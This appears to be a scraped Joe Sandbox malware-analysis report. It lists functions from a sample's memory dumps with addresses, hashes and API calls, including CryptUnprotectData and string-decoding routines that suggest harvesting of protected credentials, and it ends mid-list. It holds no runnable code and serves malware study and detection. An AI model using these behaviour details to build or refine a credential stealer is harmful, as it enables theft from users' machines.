~qXl, xrefs: 6C5F9459, 6C5F9269, 6C5F5740, 6C5F56C7, 6C5F921F, 6C5F5703, 6C5F948F

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: memset
String ID: ~qXl
API String ID: 2221118986-3388076283
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 8ee82ec89bd331ff6d83730bf5d25c7b76a3fddbec3bacc72b28a5c75a81fbf6
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 31B1D872E0021ACFDB18CF68CC90799B7B2EF95314F1402A9C599DB795E730A986CF91

Function 6C5F542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C5F88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C5F925C

Strings

~qXl, xrefs: 6C5F9459, 6C5F9269, 6C5F5740, 6C5F56C7, 6C5F921F, 6C5F5703, 6C5F948F

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: memset
String ID: ~qXl
API String ID: 2221118986-3388076283
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: a1e49bdfdb4a0b08439835e641d5c9a2184f906f16fdb4d2ddbd2e6c1e8bbc38
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 47B1B572E0120ACBDB18CE58CC816EDB7B2EF95314F144279C959DB785E730A98ACF90

Function 00790636 Relevance: 9.2, Strings: 6, Instructions: 1672COMMON

Download Yara Rule

Strings

}*r, xrefs: 0079135C
li[, xrefs: 00791371
dZiw, xrefs: 007915BC
'ZN, xrefs: 0079163C
H>[S, xrefs: 007917D7
ro,<, xrefs: 0079104E

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'ZN$H>[S$dZiw$li[$ro,<$}*r
API String ID: 0-368189084
Opcode ID: bf4339dae63669fb2ac832ddcc12d8efbb3491b01d5cd87f18695cd406dbc8d7
Instruction ID: f1fc33f4951a7d322dd2b0669bc9c6c92c3f761d3cb1e3813eb1126f1c70a37c
Opcode Fuzzy Hash: bf4339dae63669fb2ac832ddcc12d8efbb3491b01d5cd87f18695cd406dbc8d7
Instruction Fuzzy Hash: 2BB22BF3A082049FE304AE2DEC8567AFBE5EF94720F1A453DEAC4C7744EA3558058697

Function 003C9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9AEF
LocalAlloc.KERNEL32(00000040,?,?,?,003C4EEE,00000000,?), ref: 003C9B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9B2A
LocalFree.KERNEL32(?,?,?,?,003C4EEE,00000000,?), ref: 003C9B3F

Strings

N<, xrefs: 003C9AD4, 003C9AE1, 003C9AF9, 003C9B18, 003C9AE4, 003C9B1B

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N<
API String ID: 4291131564-2779024016
Opcode ID: 164e85235e818fa980078e1cccae93a3caf26795d5beb296f328395a425ebcd4
Instruction ID: fafd423aa2e9617222c467427377fb2a69df577b8f4e46d3b7f8b6d7022c4a5c
Opcode Fuzzy Hash: 164e85235e818fa980078e1cccae93a3caf26795d5beb296f328395a425ebcd4
Instruction Fuzzy Hash: 591190B4240308EFEB10CFA4DC95FAA77B6EB89700F208059F9159B390C7B6AD01CB90

Function 00788307 Relevance: 7.8, Strings: 5, Instructions: 1553COMMON

Download Yara Rule

Strings

1"C, xrefs: 00788D5D
zP>{, xrefs: 00788D26
:7, xrefs: 00788B31
vv, xrefs: 007891D0
:H=!, xrefs: 00789476

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 1"C$:H=!$:7$zP>{$vv
API String ID: 0-341639830
Opcode ID: f5095767d36108fb3635a669259a452daab2ca8bd3a17a9c004833ef8a668359
Instruction ID: ca1ac6852a17b45eace4c3b39de9f0e84632059f0f008a079bbf025929155f00
Opcode Fuzzy Hash: f5095767d36108fb3635a669259a452daab2ca8bd3a17a9c004833ef8a668359
Instruction Fuzzy Hash: 79A2E7F360C200AFE304AE2DDC8567ABBE9EF94720F1A493DE6C5D3744E63558018697

Function 003D6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 003D696C
sscanf.NTDLL ref: 003D6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003D69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003D69C0
ExitProcess.KERNEL32 ref: 003D69DA

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 13f00a221376208aac1873172bd0d0f40a3d2d5813aade900fd1e3e1b5a93d91
Instruction ID: 1e5b314c292b8080da8e93127e017ea35a7adb55e2894d53d4132eb7903b77f8
Opcode Fuzzy Hash: 13f00a221376208aac1873172bd0d0f40a3d2d5813aade900fd1e3e1b5a93d91
Instruction Fuzzy Hash: E821EE76D14208ABCF05EFE4E945AEEB7BAFF48300F04852EE416E3250EB345605CB69

Function 003C7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 003C724D
RtlAllocateHeap.NTDLL(00000000), ref: 003C7254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003C7281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003C72A4
LocalFree.KERNEL32(?), ref: 003C72AE

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 74fe674f1834009940a6a83a70a98902206090340bbaba9058889fc2dac82d38
Instruction ID: 925553ae3aeb112b93ec579aecea4f816ec8be92419a823cc26756ec0733953a
Opcode Fuzzy Hash: 74fe674f1834009940a6a83a70a98902206090340bbaba9058889fc2dac82d38
Instruction Fuzzy Hash: 82010075A80308BBEB14DBD4CD49F9E7779EB44700F108558FB05AA2C0D6B0AA018B65

Function 0079247B Relevance: 6.5, Strings: 4, Instructions: 1546COMMON

Download Yara Rule

Strings

LM]f, xrefs: 00793135
,ZHG, xrefs: 00792C4D
I8}, xrefs: 00793192
r~o, xrefs: 0079310D

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ,ZHG$I8}$LM]f$r~o
API String ID: 0-2554976609
Opcode ID: 64a5c0abe62114335524e70b3dbafa082cd67a65358537c69b2ec71a17fa1022
Instruction ID: b1226ed7deec761db10cca50833180b974955c00bf626ec76c22d47871f06123
Opcode Fuzzy Hash: 64a5c0abe62114335524e70b3dbafa082cd67a65358537c69b2ec71a17fa1022
Instruction Fuzzy Hash: 14A24AF3A0C2049FE7146E2DEC8567ABBEAEFD4320F1A463DE6C4C7744E93558058692

Function 003D8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,003C5184,40000001,00000000,00000000,?,003C5184), ref: 003D8EC0

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 36af062e3a45d3ff330b0c11617412c434d22f55aac26d6f20d6b92b1094de4c
Instruction ID: 1c2b07d7bc031395a6610d149fea85b703af27967b2fc5c940b32037e9bc56d2
Opcode Fuzzy Hash: 36af062e3a45d3ff330b0c11617412c434d22f55aac26d6f20d6b92b1094de4c
Instruction Fuzzy Hash: DB11F276200208BFDB01CFA4E884FAB33AEAF89340F10A549F9198B350DB35F941DB60

Function 0078EBFE Relevance: 5.3, Strings: 3, Instructions: 1591COMMON

Download Yara Rule

Strings

0jms, xrefs: 0078FA80
uVI?, xrefs: 0078F901
$^y?, xrefs: 0078F7CE

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
